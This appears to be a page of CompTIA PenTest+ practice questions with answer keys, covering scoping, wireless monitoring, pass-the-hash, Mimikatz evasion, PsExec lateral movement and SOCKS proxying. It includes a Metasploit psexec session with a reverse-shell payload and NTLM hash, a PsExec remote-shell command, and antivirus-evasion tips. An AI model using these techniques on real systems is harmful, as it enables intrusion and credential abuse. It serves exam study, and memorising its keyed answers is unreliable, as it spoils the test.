CompTIA PenTest+ Exam Questions

Page 7 of 25

121.

Which of the following elements in a target list for a pentest is MOST important when considering the legal and regulatory compliance of data maintained by the client?

  • Physical location

  • IP ranges

  • SaaS providers

  • Domains

Correct answer: Physical location

The location of the test can influence the legal and regulatory requirements that the client has to adhere to. For example, if the site is in the European Union, then it must adhere to GDPR.

IP ranges and domains are not bound by geographic jurisdictions. SaaS providers may reside in various jurisdictions, but they typically hold their own certifications of regulatory compliance and maintain the data themselves.

122.

Which of the following commands can you use to set your wireless adapter to capture traffic?

  • airmon-ng start <wireless interface>

  • airbase-ng <wireless interface>

  • aircrack-ng start <wireless interface>

  • ifconfig <wireless interface>

Correct answer: airmon-ng start <wireless interface>

This command is included by default in the Aircrack-ng package, and it automatically puts your wireless network device (net_device) into monitor mode.

The airbase-ng tool is used for creating rogue access points. The aircrack-ng command is the final command used to carry out the attack. The ifconfig command displays your network interfaces.

123.

A client wants to ensure the confidentiality of the organization's internal information during a penetration test. Which document should be signed for this?

  • NDA

  • SOW

  • RoE

  • MSA

Correct answer: NDA

A Non-Disclosure Agreement (NDA) protects the business's competitive advantages from being disclosed to third parties. In the event the organization is compromised, the vendor is obligated to maintain the secrecy of the privileged information it might obtain during the pentest.

An SOW is a statement of the work that will be performed. An RoE is a document that defines the boundaries, scope, and objectives of a penetration test. An MSA is used to define services that can apply to current and future contracts.

124.

Given the command excerpt below, what type of attack is being carried out?

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
LHOST => 192.168.57.133
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.57.131
RHOST => 192.168.57.131
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit

  • Pass-the-hash attack

  • Remote code execution

  • User enumeration using SMB

  • On-path attack

Correct answer: Pass-the-hash attack

Pass-the-hash attacks rely on injecting hashes into LSASS or presenting NTLM hashes to services like SMB or WMI. This is made easier by the fact that the Sysinternals PsExec tool can directly accept an NTLM hash as an argument instead of a password.

125.

During the penetration test, a pentester was able to successfully exploit a SQL injection vulnerability on the client's website. When dumping the database, they noticed that all passwords were stored in clear text. They then used the credentials from the database and attempted to authenticate against the client's other assets. Eventually, they managed to gain shell access to one of the file share servers.

What mitigation should they suggest to the client based on the above results?

  • Always store passwords in an encrypted state

  • Prevent external logging with a firewall

  • Train users to use more complex passwords

  • Change website technology to NoSQL

Correct answer: Always store passwords in an encrypted state

Regardless of the technology and the platform, passwords should always be stored in an encrypted state. There is always the danger of compromising the host when passwords are stored in plain text.

126.

Which of the following concerns is relevant when looking at REST security?

  • Ensuring that all communications between clients and the server are encrypted

  • Ensuring that all requests use Captcha during the authentication process

  • Ensuring that JWTs are not revoked after each session

  • Ensuring that rate limiting is not enacted on RESTful APIs

Correct answer: Ensuring that all communications between clients and the server are encrypted

Representational State Transfer (REST) is a modern standard for APIs. Encrypting all communications between clients and servers can be accomplished with HTTPS.

Relying on Captcha for authentication is insufficient and a hindrance for users. JSON Web Tokens (JWTs) should be revoked after each session. Rate limiting is a security measure to protect against DDoS attacks.

127.

An organization needs a penetration test. They want to be sure that the pentesters they hire have an ethical mindset. 

What can they request from the pentesting team to ensure this?

  • Background checks

  • NDA

  • Due diligence

  • Target list

Correct answer: Background checks

Background checks can be used to determine if a pentester has a criminal background and also to verify their credentials. Since pentesters will have access to sensitive information, it is important that they have an ethical mindset.

A non-disclosure agreement (NDA) is used to ensure that data is not shared with other parties. Due diligence is used to assess finances and operations of an organization. A target list is the assets that will be tested.

128.

A client has its own repository for virtual machines that it deploys. 

What type of threat does the repository pose that a pentester should be aware of?

  • Compromised instances

  • VM escape

  • W3AF attacks

  • IPMI attacks

Correct answer: Compromised instances

An attacker can insert fake or impersonated virtual machine instances into a repository. This can lead to the instances being exploited if they are used by a hypervisor.

VM escape relates to interactions between the virtual machine and its host. 

W3AF is a web application security scanner. 

IPMI attacks focus on devices that have remote management.

129.

A pentester is creating a script to scan ports of systems. They want the main part of the script to be a reusable chunk of code that takes the system to scan as input. 

What type of construct should they use for this section of code?

  • Function

  • Dictionary

  • Library

  • Boolean

Correct answer: Function

A function is a block of code that takes input, performs operations with it, and provides output. Functions, like procedures, are used to make code simpler and more concise.

A dictionary is a key-value data structure.

A library is a collection of pre-written resources for code. 

A Boolean is data that is either true or false.

130.

A penetration tester is looking through a report and notices that a vulnerability associated with the Microsoft Remote Desktop service was found on a Linux machine. 

How should they BEST categorize this finding?

  • False positive 

  • True positive

  • False negative 

  • True negative

Correct answer: False positive 

Non-credentialed vulnerability scans can produce a fair share of false positives and may provide little to no verification of discovered vulnerabilities. The Microsoft Remote Desktop service is not typically installed on a Linux machine by default, thus suggesting that the vulnerability is a false positive and not exploitable.

A true positive is successfully identifying a vulnerability. A false negative is a vulnerability that is not discovered. A true negative is a weakness that is identified but wrongly considered not to be a vulnerability.

131.

What is one of the MAIN reasons for running Mimikatz from memory?

  • Evasion

  • Fast results

  • Multithreading

  • 32-bit and 64-bit support

Correct answer: Evasion

Running Mimikatz in memory rather than on disk has benefits, such as antivirus evasion. You can also use some trivial encoding or obfuscation techniques, like modifying the Invoke-Mimikatz.ps1 script from the PowerSploit framework until it can no longer be detected by antivirus signatures.

132.

You have gained access to a Windows machine. By dumping the SAM database and cracking it, you have obtained a domain admin's credentials. 

How could you use these credentials for a lateral movement to another machine without making too much noise?

  • Use PsExec and execute commands remotely on another machine

  • Start looking for RDP services running in the network

  • Use Telnet to connect to other machines

  • Run an aggressive nmap scan on the network to find other vulnerable systems

Correct answer: Use PsExec and execute commands remotely on another machine

An example of a PsExec remote command:

.\PsExec.exe -u domainadmin -p adminpass \\remotehost cmd

This will open a cmd session on the remote host.

RDP is not as stealthy as PsExec. Telnet is a service associated with Unix-based systems. An aggressive network scan can alert administrators to a pentester's activity.

133.

You have completed the pentest engagement, but because some of the applications were still in the development stage, you were unable to properly test them. 

How could you BEST address this issue?

  • You could use the conclusion section to suggest future tests of previously excluded items

  • You could mention this issue in a face-to-face meeting with the client

  • You could prepare a new pentest offer and send it to the client with the pentest report

  • You could test the development environment as a gesture of goodwill

Correct answer: You could use the conclusion section to suggest future tests of previously excluded items

The conclusion section is where such information should be included. For example, if your penetration test scope excluded web application testing, you might recommend conducting that testing in a future engagement.

134.

Penetration testing includes a lot of technical work and generates a lot of log data. Scan results are sometimes several pages long. You want to include all this information in the report but are afraid that if you put it in the "findings" section, the report will be much too long, which is not ideal. 

Which solution will resolve this issue?

  • Reference the results in an appendix in the conclusion section

  • Do not include these results

  • Regardless of formatting and report size, all these results should be part of the findings section

  • Archive these results and provide them separately

Correct answer: Reference the results in an appendix in the conclusion section

It is good practice to keep the report clean and tidy with only relevant information in it. However, it is also good practice to provide all secondary information related to the test in an appendix for detailed technical review.

135.

You are tasked with performing a spear phishing attack. Which tool could help you quickly perform that task?

  • SET

  • Nessus

  • Ettercap

  • Nikto

Correct answer: SET

The Social-Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time. SET was developed by David Kennedy and simplifies a number of social engineering attacks such as phishing, spear phishing, malicious USBs, etc. Furthermore, it has been integrated with Metasploit so that pentesters can use Metasploit exploits and payloads in social engineering attacks.

Phishing and spear phishing are very common forms of email attacks designed to trick you into performing a specific action—typically clicking on a malicious link or attachment. The difference between them is primarily a matter of targeting. Phishing emails are sent to very large numbers of recipients, more or less at random, with the expectation that only a small percentage will respond. Spear phishing emails are carefully designed to get a single recipient to respond.

Nessus is used for vulnerability assessments. Ettercap is used for on-path attacks. Nikto is a web server scanner.

136.

Which is a common indicator of an account takeover of cloud services?

  • Unusual login locations or times

  • High CPU usage on VMs

  • Disabling of logging and monitoring

  • Increased traffic to web applications

Correct answer: Unusual login locations or times

Logins from unusual locations or at unusual times can be an indicator of an account takeover of cloud services. Accounts are often compromised through social engineering efforts.

High CPU usage can be an indicator of a compromised VM. Disabled logging or monitoring is an indicator of stronger malicious activity. Increased traffic to web servers can be an indicator of a DDoS.

137.

What remediation method could be suggested in the following scenario?

On one of a client's servers, the following services are found to be running: 

  • 22 SSH
  • 23 Telnet
  • 25 SMTP
  • 80 HTTP
  • 443 HTTPS

Upon checking with the client, you are informed that they haven't used telnet for years.

  • Close all unused ports and disable all unused services

  • Change the telnet port to one less frequently used

  • Institute a regular user password-changing policy

  • Use two-factor authentication for telnet login

Correct answer: Close all unused ports and disable all unused services

One of the best and, in fact, mandatory ways to improve the security state of a system, or even of an environment, is to make sure there are no running services or open ports that are not being used.

138.

In the middle of your testing window, you have managed to obtain what appears to be the username and NTLM password hash for the domain admin account. You tried cracking the password but were not successful. 

What other options do you have?

  • You can try a "pass-the-hash" attack with mimikatz

  • You can try a "pass-the-hash" attack using hashcat

  • If the password can't be cracked, there is nothing else to try

  • You can use the hash in a brute-force attack

Correct answer: You can try a "pass-the-hash" attack with mimikatz

Mimikatz is a very powerful tool that offers the functionality of using a hash for authentication. 

Hashcat does not offer "pass-the-hash" capability.

139.

You completed a scan of the client's server and discovered a running SMTP service on port 587. You tested the service for all known exploitations, and it failed. When you reported the open port, the client was surprised and informed you that this SMTP was no longer used. 

How should you handle the SMTP service in your report?

  • You should suggest the SMTP be stopped and the port be closed, as it is no longer needed

  • As long as the service is secure and not exploitable, there is no harm in keeping it running

  • Additional security layers should be added to this service if possible

  • This is not your concern because it was also new to the client

Correct answer: You should suggest the SMTP be stopped and the port be closed, as it is no longer needed

All unused services should be stopped, and all unused ports should be closed. Even though this service was not exploitable at the time, it could be exploited later.

140.

What will the following command achieve?

ssh -D 8181 www.example.com

  • It will create an SSH SOCKS proxy through www.example.com

  • It will attempt to connect to example.com over port 8181 via SSH

  • It will dump credentials from www.example.com over SSH on port 8181

  • It will scan www.example.com for SSH service on port 8181 

Correct answer: It will create an SSH SOCKS proxy through www.example.com

This command opens a local SOCKS (SOCKS4 or SOCKS5) proxy on port 8181 that tunnels traffic through www.example.com. You can configure your web browser to use this proxy when browsing web pages, and it also allows you to execute port scans against internal hosts from outside the network through the SOCKS proxy.